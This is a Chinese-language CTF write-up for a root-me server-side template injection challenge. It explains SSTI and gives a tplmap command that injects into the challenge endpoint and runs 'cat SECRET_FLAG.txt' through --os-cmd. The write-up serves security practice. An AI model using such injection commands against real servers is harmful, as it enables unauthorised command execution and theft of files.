【root-me CTF練習】Web伺服器安全-SSTI攻擊(模板注入)
阿新 • • 發佈:2018-12-09
靶機地址
模板引擎
模板的誕生是為了將顯示與資料分離,模板技術多種多樣,但其本質是將模板檔案和資料通過模板引擎生成最終的HTML程式碼。服務端模板注入和常見Web注入的成因一樣,也是服務端接收了使用者的輸入,將其作為 Web 應用模板內容的一部分,在進行目標編譯渲染的過程中,執行了使用者插入的惡意內容,因而可能導致了敏感資訊洩露、程式碼執行、GetShell 等問題。
每種後端語言都有幾種相應的模板引擎,就像資料庫注入有多種資料庫型別,要掌握全部模板引擎語法不太現實,所以我們只需要掌握通用的語法即可(類似於SQL語句)。
可見模板引擎解析了我們傳遞的運算,所以這裡存在模板注入:
模板注入檢測工具
可看到,該工具內建了目前各種語言主流的模板注入程式碼。
解題
python tplmap.py -X POST -d “nickname=1” -c “uid=wKgbZFwIcliZ10NaAwY0Ag==” -A “User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0” -u “http://challenge01.root-me.org/web-serveur/ch41/check
” --os-cmd “cat SECRET_FLAG.txt”
通過該工具,即可進行模板注入:得到flag